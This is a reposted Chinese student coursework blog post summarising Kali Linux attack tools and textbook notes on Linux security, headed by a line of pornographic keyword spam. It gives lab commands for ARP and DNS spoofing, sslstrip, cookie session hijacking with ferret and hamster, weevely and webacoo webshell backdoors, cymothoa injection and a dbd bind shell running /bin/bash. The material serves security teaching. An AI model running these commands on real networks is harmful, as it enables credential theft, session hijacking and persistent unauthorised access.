日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

20189320《网络攻防》第八周作业

發布時間:2023/12/18 编程问答 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 20189320《网络攻防》第八周作业 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

一、Kali視頻學習總結

(一)漏洞利用之SET

? ? ? ?Social Engineering Toolkit(SET)是一個開源、Python驅動的社會工程學滲透測試工具,提供了非常豐富的攻擊向量庫,是開源的社會工程學利用套件,通常結合Metasploit來使用。

? ? ? ?1.命令行下輸入setoolkit打開SET套件

? ? ? ?

? ? ? ?2.菜單選項1是社會工程學攻擊,輸入1回車后,可以看到相應的模塊

? ? ? ?
? ? ? ?可以看到共有11個模塊,分別為:
? ? ? ?

? ? ? ?3.輸入1進入魚叉式釣魚攻擊

? ? ? ?
? ? ? ?此攻擊向量主要目的為發送存在惡意軟件的釣魚郵件。
? ? ? ?相應的payload可以選擇不同的漏洞(輸入2)。
? ? ? ?

? ? ? ?4.返回主菜單,輸入2進入網站攻擊框架

? ? ? ?
? ? ? ?此時可以開放一個WEBServer服務,如果對方訪問此頁面,若系統存在漏洞觸發條件,則會被植入后門。
? ? ? ?如Java Applet Attack方法就需要目標有Java運行環境。為了仿真,可以選擇自建模板或克隆一個網站:
? ? ? ?

? ? ? ?5.返回主菜單,輸入3進入介質感染攻擊

? ? ? ?
? ? ? ?借助Autorun.inf執行Exploit得到一個返回的shell,也可以結合Metasploit的后門。

? ? ? ?6.返回主菜單,輸入4創建Payload和監聽器

? ? ? ?
? ? ? ?創建一個返回的Payload并開啟監聽。
? ? ? ?
? ? ? ?可以看出,與Metasploit給出的Payload類似。

? ? ? ?7.返回主菜單,輸入5進入群發郵件攻擊

? ? ? ?
? ? ? ?支持導入列表并向列表中的每個人發送郵件。

? ? ? ?8.基于Arduino的攻擊

? ? ? ?

? ? ? ?9.短信欺騙攻擊

? ? ? ?10.無線接入點攻擊

? ? ? ?無線接入點攻擊會創建一個虛擬無線AP,通過接入點ap可以抓取所有連接進來的設備流量。
? ? ? ?

? ? ? ?11.二維碼攻擊

? ? ? ?
? ? ? ?填入一個危險的URL,使得被攻擊者掃描二維碼自動訪問頁面而中招。

? ? ? ?12.PowerShell攻擊

? ? ? ?
? ? ? ?針對Vista以上的PowerShell攻擊模塊。

? ? ? ?13.Fast-Track攻擊模塊

? ? ? ?除了社會工程學攻擊模塊,SET還整合了Fast-Track攻擊模塊。
? ? ? ?
? ? ? ?包括一些常見的攻擊模式:
? ? ? ?

? ? ? ?14.其他功能

? ? ? ?
? ? ? ?其他功能主要為第三方模塊、工具更新及工具配置等信息。

(二)嗅探欺騙與中間人攻擊

? ? ? ?對于嗅探、欺騙工具,Kali將其單獨分類并細化。Linux下的中間人攻擊套路都是一樣的,這里介紹進行ARP欺騙、DNS欺騙和嗅探以及會話劫持(cookies)的方法。

? ? ? ?1.為Kali設置開啟端口轉發

$ echo 1 > /proc/sys/net/ipv4/ip_forward $ cat /proc/sys/net/ipv4/ip_forward

? ? ? ?

? ? ? ?2.設置ssltrip

/* 為了劫持SSL數據,需要使https數據變為http */ $ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8081 $ sslstrip -l 8081 /* 讓sslstrip在8081端口監聽 */

? ? ? ?

? ? ? ?3.ettercap的準備

? ? ? ?ettercap是一套用于中間人攻擊的工具,和dsniff套件齊名。它的強大之處在于支持插件和過濾腳本,直接將賬號、密碼顯示出來,不用人工提取數據。如果是第一次進行中間人攻擊操作,那么要對Kali下的ettercap做點配置。
? ? ? ?配置文件是/etc/ettercap/etter.conf,首先要將ec_uid、ec_gid都變為0。
? ? ? ?
? ? ? ?然后找到Linux分類下的if you use iptables這一行,將注釋("#"號)去掉,打開轉發。
? ? ? ?

? ? ? ?4.ettercap使用

? ? ? ?(1)打開ettercap:
? ? ? ?
? ? ? ?(2)選擇sniff選項—>unified sniffing,選擇嗅探網卡,默認eth0。
? ? ? ?
? ? ? ?(3)選擇hosts選項:先scan for hosts,等掃描完了選host list。
? ? ? ?
? ? ? ?可以看到,有2臺主機被添加到主機列表中。
? ? ? ?(4)把網關安排到target 1,想攻擊的目標放到target 2;mitm選項卡選擇arp poisioning,然后start即可。
? ? ? ?
? ? ? ?
? ? ? ?當同處一個局域網的受害者訪問網頁,進行登錄時,它的密碼就被你記下來了。

? ? ? ?5.Dsniff套裝介紹

? ? ? ?Dsniff套裝主要是arpspoof和dsniff,前者用來進行arp欺騙,后者用于嗅探。進行攻擊步驟如下:
? ? ? ?(1)進行arp欺騙:

$ arpspoof [-i interface(網卡)] [-c own|host|both(欺騙方式,通常是both)] [-t target(目標)] [-r] host(網關)

? ? ? ?(2)進行嗅探:

$ dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen] [-f services] [-t trigger[,...]] [-r|-w savefile] [expression]

? ? ? ?其中:
? ? ? ?-c 打開半雙工TCP流,允許在使用arpspoof時進行正確的嗅探操作。
? ? ? ?-d 啟動調試模式。
? ? ? ?-f 以/etc/service格式從文件中加載觸發器(也就是口令嗅探的服務類型)。
? ? ? ?-I 使用特定的網絡接口。
? ? ? ? -m 使用dsniff.magic文件通過在magic文件中定義的特征嘗試自動判斷協議。
? ? ? ?-n 不執行主機查找。
? ? ? ?-r 從前面保存的會話中讀取被嗅探的數據。
? ? ? ?-s 最多對報文的前個字節進行嗅探,如果用戶名和口令信息包含在隨后的默認1024字節界限中。
? ? ? ?-t 使用格式port /proto=servise;來加載一個以逗號界定的觸發器集。

? ? ? ?6.會話劫持

? ? ? ?這里主要以cookies進行舉例,說明會話劫持的用法。
? ? ? ?(1)開始arp欺騙:

$ arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102

? ? ? ?(2)捕獲數據報:

$ tcpdump -i wlan0 -w test.cap

? ? ? ?(3)等過一段時間,估計目標會登錄網站了,我們開始處理捕獲的數據包:

$ ferret -r test.cap

? ? ? ?如果捕獲的數據包沒什么問題,而且確定開啟了端口轉發,那么經過處理的數據包會自動生成hamster.txt
? ? ? ?(4)接下來我們運行hamster:

$ hamster

? ? ? ?會自動提示瀏覽器設置代理為http://127.0.0.1:1234。
? ? ? ?(5)接著我們在瀏覽器中打開hamster:http://hamster,選擇目標和可能的登錄認證地址,然后點擊鏈接會發現自己已經變成他了。

? ? ? ?7.圖片截獲

? ? ? ?利用Driftnet這款工具我們可以看到受害人在訪問網站的圖片。
? ? ? ?首先,使用arpspoof啟動arp欺騙。
? ? ? ?然后,啟動driftnet:

$ driftent -i

? ? ? ?此時會彈出一個小窗口,當目標訪問有圖片的網站時,攻擊者就能在這個小窗口中看到。

? ? ? ?8.DNS欺騙

? ? ? ?利用Dsniff套裝中的dnsspoof或者ettercap的dnsspoof插件,我們可以完成對受害者的DNS欺騙。
? ? ? ?(1)在開始欺騙前,首先我們要編輯一個自己的hosts文件,放在方便訪問的地方。內容和本機自帶的hosts內容差不多,只是把你想欺騙的域名和想要欺騙到哪里的地址寫好(通常是攻擊者指定的服務器,用來執行瀏覽器溢出或者java applet攻擊,用來獲取受害者的計算機訪問權限)
? ? ? ?host文件:

$ 127.0.0.1 www.baidu.com

? ? ? ?上面是一個hosts文件示例,把百度定向到了本機。我們把它保存成hosts,位于/root目錄下。
? ? ? ?(2)然后啟動dnsspoof:

$ dnsspoof -i wlan0 -f /root/hosts

? ? ? ?就等著受害者訪問baidu來觀察效果。

? ? ? ?9.URL監控

? ? ? ?利用Dsniff套裝中的urlsnarf工具,我們對TCP80、3128、8080端口的HTTP通信進行解析,并且可以將嗅探到的所有HTTP請求轉存為通用日志格式(Common Log Format,CLF),這種格式是許多Web服務器所使用的,例如IIS和Apache,事后可以很方便地使用一些日志分析工具來分析記錄結果。

$ urlsnarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]

? ? ? ?10.下載軟件監控

? ? ? ?利用Dsniff套裝中的filesnarf工具,我們可以從嗅探到的NFS通信中,選定某個文件,轉儲到本地當前工作目錄。

$ filesnarf [-i interface | -p pcapfile] [[-v] pattern [expression]]

(三)權限維持之后門

? ? ? ?權限維持包含Tunnel工具集、Web后門、系統后門三個子類。其中,系統后門與Web后門統稱為后門,都是為滲透測試后,為方便再次進入系統而留下的惡意程序。這里主要對Kali下的后門進行介紹:

? ? ? ?1. Weevely

? ? ? ?Weevely是一款使用Python編寫的webshell工具(集webshell生成和連接于一身,僅用于安全學習教學之用,禁止非法用途),可以算作是Linux下的一款菜刀替代工具(限于php),在Linux上使用時還是很給力的,就是某些模塊在Windows上無法使用,總的來說還是非常不錯的一款工具。
? ? ? ?
? ? ? ?Weevely的使用步驟如下:
? ? ? ?(1)生成一個php后門:

$ weevely generate test ~/1.php /* test為密碼,在本地生成~/1.php */

? ? ? ?查看生成的后門:

$ cat 1.php

? ? ? ?
? ? ? ?(2)將后門上傳至WEB,使用Weevely連接。

$ weevely http://192.168.43.72/shell.php test

? ? ? ?①復制后門。
? ? ? ?②查看目標機ip。
? ? ? ?使用Linux靶機作為目標機,目標機的IP地址為192.168.43.72。
? ? ? ?
? ? ? ?③在主機上使用ssh連接。

$ ssh root@192.168.43.72

? ? ? ?④nano 1.php 復制生成文件內容到其中
? ? ? ?⑤使用命令weevely http://192.168.199.149/1.php test進行連接

? ? ? ?2.WeBaCoo

? ? ? ?WeBaCoo(Web Backdoor Cookie)script-kit是一個小巧的、隱蔽的php后門,它提供了一個可以遠程連接web服務器并執行php代碼的終端。WeBaCoo使用HTTP響應頭傳送命令結果,shell命令經base64編碼后隱藏在Cookie頭中。
? ? ? ?(1)生成一個webshell。
? ? ? ?(2)復制生成文件內容到2.php文件。

$ nano 2.php

? ? ? ?(3)上傳到網站后,使用Webacoo連接:

$ webacoo -t -u http://192.168.43.132/2.php

? ? ? ?3.Cymothoa系統后門

? ? ? ?枚舉/bin/bash進程pid。
? ? ? ?cymothoa -10500 -s -0 -y 2333 (注入2333端口),如果成功,可以連接2333端口返回一個shell。

? ? ? ?4.dbd,sdb:加強版的nc

? ? ? ?監聽端:dbd -l -p 2333 -e /bin/bash -k password
? ? ? ?攻擊端:dbd 127.0.0.1 2333 -k password

? ? ? ?5.U3-Pwn

? ? ? ?與Metasploit Payload結合使用的工具,菜單可以單刀多針對移動光驅設備如光驅鏡像,u盤等。

? ? ? ?6.Intersect

? ? ? ?(1)創建后門腳本
? ? ? ?自動添加組件,生成一個shell。
? ? ? ?(2)創建后門
? ? ? ?(3)執行后門
? ? ? ?①輸入./1.py -b進行綁定。
? ? ? ?②使用nc命令進行連接。
? ? ? ?③執行成功,返回一個shell。

(四)權限維持之Tunnel

? ? ? ?權限維持包含Tunnel工具集、Web后門、系統后門三個子類。其中,Tunnel工具集包含了一系列用于建立通信隧道、代理的工具。

? ? ? ?1.CryptCat

? ? ? ?CryptCat是網絡工具中有“瑞士軍刀”之稱的Netcat的加密版,與dbd和sbd使用也類似。
? ? ? ?

? ? ? ?2.DNS2TCP

? ? ? ?(1)什么是DNS Tunnel?
? ? ? ?DNS Tunnel即DNS隧道。從名字上來看就是利用DNS查詢過程建立起隧道,傳輸數據。
? ? ? ?(2)為什么使用DNS Tunnel?
? ? ? ?
? ? ? ?(3)DNS Tunnel的原理:
? ? ? ?
? ? ? ?DNS2TCP是一個使用C語言開發的、利用DNS Tunnel轉發TCP連接的工具,包括DNS2TCPC(客戶端)和DNS2TCPD(服務端)兩部分。通常,DNS2TCPC和DNS2TCPD結合起來使用。
? ? ? ?
? ? ? ?

? ? ? ?3.Iodine:與DNS2TCP類似

? ? ? ?

? ? ? ?4.Miredo

? ? ? ?Miredo是一個網絡工具,主要用于BSD和Linux的IPV6 Teredo隧道鏈接,可以轉換不支持IPV6的網絡連接IPV6,內核中需要有IPV6和TUN隧道支持。
? ? ? ?

? ? ? ?5.Proxychains

? ? ? ?Proxychains是內網滲透測試經常會用到的一款工具,如我們使用Meterpreter開設一個Socks4a代理服務,通過修改/etc/prosychains.conf配置文件,加入代理,即可使其他工具如sqlmap、namp直接使用代理掃描內網。
? ? ? ?例如,

$ nano /etc/proxychains.conf $ proxychains namp -sT -Pn 10.0.0.1/24

? ? ? ?

? ? ? ?6.Proxytunnel

? ? ? ?Proxytunnel可通過標準的HTTPS代理來連接遠程服務器,這是一個代理,實現了橋接的功能。特別用于通過SSH進行HTTP(S)傳輸。
? ? ? ?
? ? ? ?Proxytunnel可用于:
? ? ? ?(1)使用HTTP(S)代理(HTTP CONNECT命令)創建通訊通道。
? ? ? ?(2)為OpenSSH寫一個客戶端驅動,并創建基于SSH連接的HTTP(S)代理。
? ? ? ?作為一個獨立的應用,可以連接到遠程服務器。

? ? ? ?7.Ptunnel

? ? ? ?借助ICMP數據包建立隧道通信。
? ? ? ?

? ? ? ?8.Pwnat

? ? ? ?內網下通過UDP通信。
? ? ? ?

? ? ? ?9.Socat

? ? ? ?可以在不同協議下進行轉發數據。
? ? ? ?

? ? ? ?10.sslh

? ? ? ?一個ssl/ssh端口復用工具,sslh可以在同一個端口上接受HTTPS、SSH和OpenVPN連接。這使得通過443端口連接SSH服務器或者OpenVPN服務同時在該端口上提供HTTPS服務成為可能。sslh可以作為一個研究端口復用的例子。
? ? ? ?

? ? ? ?11.Stunnel

? ? ? ?

? ? ? ?12.Udptunnel

? ? ? ?

(五)逆向工程工具

? ? ? ?逆向工程是根據已有的東西和結果,通過分析來推導出具體的實現方法。比如你看到別人寫的某個exe程序能夠做出某種漂亮的動畫效果,你通過反匯編、反編譯和動態跟蹤等方法,分析出其動畫效果的實現過程,這種行為就是逆向工程:不僅僅是反編譯,而且還要推導出設計,并且文檔化,逆向軟件工程的目的是使軟件得以維護。
? ? ? ?Kali下的逆向工程工具包括調試器、反編譯工具與其他逆向工具集。

? ? ? ?1.Edb-Debugger

? ? ? ?EDB(Evan's Debugger)是一個基于Qt4開發的圖形化的二進制調試工具,主要是為了跟OllyDbg工具看齊,通過插件體系可以進行功能的擴充,當前只支持Linux。
? ? ? ?

? ? ? ?2.OllyDbg

? ? ? ?經典的Ring3級調試器,是一個動態調試工具,將IDA與SoftICE結合起來的思想。在Kali下是Wine方式運行的OllyDbg。
? ? ? ?

? ? ? ?3.Jad

? ? ? ?Jad是一個Java反編譯工具。
? ? ? ?

? ? ? ?4.Radare2

? ? ? ?Radare2是一款開放源代碼的逆向工程平臺,它可以反匯編、調試、分析和操作二進制文件。
? ? ? ?Radare2的主要特點:
? ? ? ?
? ? ? ?其包含rabin2、radiff2、rasm2等工具。
? ? ? ?

? ? ? ?5.Recstudio

? ? ? ?Recstudio是一個反編譯工具。

? ? ? ?6.APKTool

? ? ? ?APKTool是Google提供的APK編譯工具。能夠反編譯及回編譯apk,同時安裝反編譯系統apk所需要的framework-res框架。
? ? ? ?

? ? ? ?7.Clang、Clang++

? ? ? ?Clang是一個C語言、C++、Objective C、Objective C++語言的輕量級編譯器。
? ? ? ?

? ? ? ?8.D2j-dex2jar

? ? ? ?反編譯dex文件到jar文件,進而可以用其他工具查看源代碼。
? ? ? ?

? ? ? ?9.Flasm

? ? ? ?Flasm主要功能是用于直接修改swf文件里的腳本actionscrpt。
? ? ? ?
? ? ? ?swf轉fla文件的軟件不能確保100%還原,如果只是修改as腳本代碼,flasm是最佳的選擇,因為它只修改腳本,資源數據不作修改。目前Flasm支持破解Flasm8和低于Flasm8格式的swf文件。

? ? ? ?10.JavaSnoop

? ? ? ?JavaSnoop是一個Java應用程序安全測試工具,它允許你以攔截的方法,篡改數據和hack運行在你計算機上的Java應用程序。通常在沒有源代碼的情況下,測試Java客戶端的安全性最好的結果是不可預知的,最壞的結果是不切實際的。
? ? ? ?在有源代碼的情況下,你可以運行一個簡單的Java程序和遠程附加一個調試器調試它,單步運行、根據需要改變變量,但對于一個applet來說要想做到這一點是有點困難的。有時,你可能需要修改客戶端和服務器之間的通信,一般的做法是在客戶端配置一個代理,在代理上修改數據。問題的關鍵是通信的數據通常不是明文的,它可能使用了自定義的協議、序列化的對象、加密的數據或者多種方式混合應用。這樣要想修改通信過程中的數據是比較困難的。JavaSnoop這個工具就試圖來解決這些問題,它允許你直接附加到一個運行中的進程,類似于調試器,然后立即篡改方法調用、運行自定義代碼或者僅僅監視在系統中發生了什么。
? ? ? ?
? ? ? ?

二、教材學習總結

(一)Linux操作系統基本框架概論

? ? ? ?1.Linux操作系統發展與現狀

? ? ? ?在統一內核代碼庫的基礎上,Linux開源社區根據不同用戶群體的需求,也發展出數量眾多的操作系統發行版,流行的包括Ubuntu、Debian、Fedora、CentOS、RHEL、OpenSUSE和Slackware等。Linux操作系統之所以會成為目前最受關注的系統之一,主要原因是它的開放源代碼與免費。

? ? ? ?2.Linux操作系統基本框架

? ? ? ?(1)Linux系統的優勢:
? ? ? ?跨平臺的硬件支持、豐富的軟件支持、多用戶多任務、可靠的安全性、良好的穩定性、完善的網絡功能。
? ? ? ?(2)Linux系統結構主要包括:
? ? ? ?進程與線程管理機制、內存管理機制、文件系統管理機制、設備控制機制、網絡機制、系統調用機制。

(二)Linux操作系統安全機制

? ? ? ?1.Linux身份認證機制

? ? ? ?主要通過創建多種角色類型的用戶及用戶組來實施用戶身份管理。

? ? ? ?2.Linux授權與訪問控制機制

? ? ? ?通過VFS虛擬文件系統實現對不同類別文件系統格式的支持,并通過設備文件類型來統一集成對其它類型系統資源的管理。

? ? ? ?3.Linux安全審計機制

? ? ? ?包括連接時間日志、進程統計日志、錯誤日志記錄。

(三)Linux系統遠程攻防技術

? ? ? ?1.Linux遠程口令字猜測攻擊

? ? ? ?主要針對SSH、telnet、FTP、HTTP等服務口令。
? ? ? ?防范措施:使用強口令字。

? ? ? ?2.Linux網絡服務遠程滲透攻擊

? ? ? ?主要針對Linux系統網絡服務、Linux內核中的網絡協議棧、LAMP Web網站構建解決方案中的網絡服務、FTP與Samba等文件共享服務、電子郵件收發服務、例如OpenSSH、NFS等的其他常用網絡服務。
? ? ? ?防范措施:禁用所有不必要的網絡服務、盡量選擇更安全的網絡協議與服務軟件并使用最佳安全實踐進行部署、及時更新網絡服務版本、使用xinetd、防火墻為Linux網絡服務添加網絡訪問控制機制、建立入侵檢測與應急響應計劃流程。

? ? ? ?3.攻擊Linux客戶端程序和用戶

? ? ? ?主要針對Linux平臺上的客戶端程序、系統用戶。
? ? ? ?防范措施:主要有對軟件進行及時更新、增加自身的安全意識

? ? ? ?4.攻擊Linux路由器與監聽器

? ? ? ?防范措施:要有安全對抗與博弈的意識,提升自己的技術實力,及時對問題進行修補。

(四)Linux系統本地安全攻防技術

? ? ? ?1.Linux本地特權提升

? ? ? ?通過Linux用戶口令字破解、利用sudo的缺陷進行特權提升、利用用戶態SUID程序漏洞進行特權提升、針對SUID程序的本地緩沖區溢出攻擊、針對SUID程序的符號鏈接攻擊、針對SUID程序的競爭條件攻擊、針對SUID程序的共享函數庫攻擊、利用內核空間代碼漏洞進行特權提升、利用系統配置不當實施本地特權提升。
? ? ? ?防范措施:看緊那些擁有特權的代碼是關鍵。

? ? ? ?2.Linux系統上的消蹤滅跡

? ? ? ?主要通過清理系統日志。

? ? ? ?3.Linux系統遠程控制后門程序

? ? ? ?主要有特洛伊木馬化的系統程序、命令行后門工具及圖形化后門工具。
? ? ? ?防范措施:預防Rootkit進入內核。

轉載于:https://www.cnblogs.com/microsala/p/10730918.html

總結

以上是生活随笔為你收集整理的20189320《网络攻防》第八周作业的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。